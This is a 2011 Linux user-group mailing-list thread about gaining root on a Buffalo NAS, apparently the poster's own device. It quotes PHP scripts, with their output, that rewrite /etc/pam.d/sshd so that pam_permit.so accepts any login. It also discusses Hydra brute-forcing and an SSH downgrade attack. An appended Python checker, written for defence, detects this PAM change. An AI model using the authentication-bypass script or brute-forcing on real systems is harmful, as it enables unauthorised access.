On Mon, Jul 18, 2011 at 10:06 PM, Dan Dubovik <dandubo@gmail.com> wrote:
Can you SSH as the hammerhead user? 
No
mark@orca:~/Desktop/buffalo_nas$ ssh hammerhead@xxx.xxx.xxx.xxx
Password:
Connection to xxx.xxx.xxx.xxx closed by remote host.
Connection to xxx.xxx.xxx.xxx closed.

When you FTP as the hammerhead user, can you move the script.php file to the htdocs directory?  It has 777 permissions, so should be able to open it / drop a file there.
Yes, I can, and it does execute.

If you can get a PHP file uploaded and able to execute properly, perhaps a PHP based shell could help?
I am not a php guy.....I don't know how to do this.

I tried a script to allow ssh without password for anyone. It seems to have written the file, however, I still cannot ssh in as root. Note: this is my first php script; the print statements helped me debug and see if it was working.

<?php
echo "starting...<br>";
$filename = '/etc/pam.d/sshd';
$fh = fopen($filename, 'w+') or die("can't open file");
$contents = fread($fh, 1000);
echo "..file contents:<br> $contents<br>";

$stringData = "account  required   pam_unix.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
    echo "...#1 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";
   
$stringData = "session  required   pam_unix.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
    echo "...#2 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";
   
$stringData = "auth required pam_permit.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
    echo "...#3 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";
   
rewind($fh);
$contents = fread($fh, 1000);
echo "...final file contents:<br> $contents<br>";

fclose($fh);
echo "done!<br>";
?>

Output from the script:
starting...
..file contents:

...wrote 32 bytes: 'account required pam_unix.so '
...wrote 32 bytes: 'session required pam_unix.so '
...wrote 28 bytes: 'auth required pam_permit.so '
...final file contents:
account required pam_unix.so session required pam_unix.so auth required pam_permit.so
done!

One strange behavior....when I re-run the script, I expected to see the contents of the file displayed after 'starting...' above, but it always comes back blank, and I still cannot log in using ssh....

I did this:
1. restart the nas
2. run script
3. I get this output:
mark@orca:~/Desktop/buffalo_nas$ ssh root@xxx.xxx.xxx.xxx
Connection closed by xxx.xxx.xxx.xxx

4. reset nas again
5. I get this output:
mark@orca:~/Desktop/buffalo_nas$ ssh root@xxx.xxx.xxx.xxx
Password:
Password:
Password:

Then all I get when I try to ssh in is Connection closed.

Does anyone have any php scripts to hack this box and give me root access via ssh?

Thanks!

Mark

-- Dan.

On Mon, Jul 18, 2011 at 9:20 PM, Lisa Kachold <lisakachold@obnosis.com> wrote:
I believe the script.php has to be moved to the webroot directory and given permissions there I believe, but well if you can't get a login via ssh... -- how to do it?


On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips <mark@phillipsmarketing.biz> wrote:
On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold <lisakachold@obnosis.com> wrote:
There are a lot of password files and dictionary lists on various sites.  Backtrack5 contains a good number.

But I imagine that it's either not allowing root via ssh or you have the wrong username.

It turns out the box is smarter than a fifth grader.....after a few hydra attacks, it started rejecting all the hydra attempts to ssh in via root. Once I stopped hydra (after running all night), it took a couple of hours before it would respond to ssh attempts from root. It now will ask for the root password, but I still have no idea what it is.

Or it's a truly random string.
It could be....the password for the zip file to unzip the file system is YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4. Someone retrieved it using a disassembler on the file system.

I did some more reading, and one person was able to use php to allow ssh login. The box allows one to create a web space, and it comes with php installed. One can edit the php.ini file, and I can upload via ftp a php script. The script they suggested is:
<?php
$file = '../../../../etc/pam.d/sshd';
$fh=fopen($file, 'w') or die("can't open file");
$stringData = "account  required   pam_unix.so\n";
fwrite($fh, $stringData);
$stringData = "session  required   pam_unix.so\n";
fwrite($fh, $stringData);
$stringData = "auth required pam_permit.so\n";
fwrite($fh, $stringData);
fclose($fh);
?>

I uploaded the script, but I get a 404 File not Found when I access the page. I thought it might be a file permission error since the file is only rw. I tried chmod 777 at the ftp prompt, and got the error message File not Found, but ls shows it is there.

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx   2 apache   apache          6 Jul 17 08:23 cgi-bin
drwxrwxrwx   2 apache   apache         22 Jul 17 08:23 htdocs
drwxrwxrwx   2 apache   apache         39 Jul 17 08:23 log
-rw-rw-rw-   1 hammerhead hdusers       335 Jul 17 08:49 script.php
226 Transfer complete
ftp> chmod 777 script.php
550 CHMOD 777 script.php: No such file or directory
ftp>

Is there anything I can change in the php.ini file to make this script execute? Or, am I missing something else?

BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.

Thanks,

Mark

On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips <mark@phillipsmarketing.biz> wrote:
Since this is a drive buffalo, I might try ettercap ssh downgrade attack:

http://openmaniak.com/ettercap_filter.php
http://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade

Not sure how a man in the middle attack will work, since I don't know the password to begin with...

Or Hydra:

Hydra Instructions:

http://www.youtube.com/watch?v=7CP-JB4QARo

Hydra is promising. I tried it with the common passwords list from openwall. No luck. Do you have any better password lists?

Thanks,

Mark

---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

--
(602) 791-8002  Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice


HomeSmartInternational.com
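
A defender-side check for the /etc/pam.d/sshd change discussed in this thread, added here and not written by any participant: it parses a PAM service file and reports when the auth stack is satisfied by pam_permit.so instead of a real authentication module. The function names are illustrative, and every sample except the three lines taken from the thread's script is constructed.

```python
import os

ALWAYS_OK = {"pam_permit.so"}  # modules that succeed without checking anything

def parse_pam(text):
    """Yield (type, control, module) for each rule line of a PAM service file."""
    for raw in text.replace("\\\n", " ").splitlines():   # join continuation lines
        fields = raw.split("#", 1)[0].split()            # drop comments
        if len(fields) < 3 or fields[0] == "@include":
            continue
        mtype = fields[0].lstrip("-").lower()            # "-auth" = optional module
        if fields[1].startswith("["):                    # [value=action ...] control
            end = next((i for i, f in enumerate(fields) if f.endswith("]")), None)
            if end is None or end + 1 >= len(fields):
                continue
            control, module = " ".join(fields[1:end + 1]), fields[end + 1]
        else:
            control, module = fields[1].lower(), fields[2]
        yield mtype, control, os.path.basename(module)

def audit_auth(text):
    """Report auth stacks in which pam_permit.so replaces a real credential check."""
    auth = [(c, m) for t, c, m in parse_pam(text) if t == "auth"]
    findings = []
    if auth and all(m in ALWAYS_OK for _, m in auth):
        findings.append("auth stack contains only pam_permit.so: no credential is verified")
    gated = False  # becomes True once a real module is required/requisite
    for control, module in auth:
        if module in ALWAYS_OK and control == "sufficient" and not gated:
            findings.append("'auth sufficient pam_permit.so' ends the stack with success")
        elif module not in ALWAYS_OK and control in ("required", "requisite"):
            gated = True
    return findings

# The three lines the thread's script writes to /etc/pam.d/sshd.
FROM_THREAD = ("account  required   pam_unix.so\n"
               "session  required   pam_unix.so\n"
               "auth required pam_permit.so\n")
# Constructed samples: a plain pam_unix stack and a Debian-style stack in which
# pam_permit.so is only reached after pam_unix.so has succeeded.
PLAIN = "auth required pam_unix.so\naccount required pam_unix.so\n"
DEBIAN_STYLE = ("auth [success=1 default=ignore] pam_unix.so nullok\n"
                "auth requisite pam_deny.so\n"
                "auth required pam_permit.so\n")

if __name__ == "__main__":
    for name, text in (("from thread", FROM_THREAD), ("plain", PLAIN),
                       ("debian-style", DEBIAN_STYLE)):
        print(name, audit_auth(text) or "ok")
```

Bracketed controls such as `[success=1 default=ignore]` are parsed but not evaluated, so a stack that relies on them for its only gate needs a manual look.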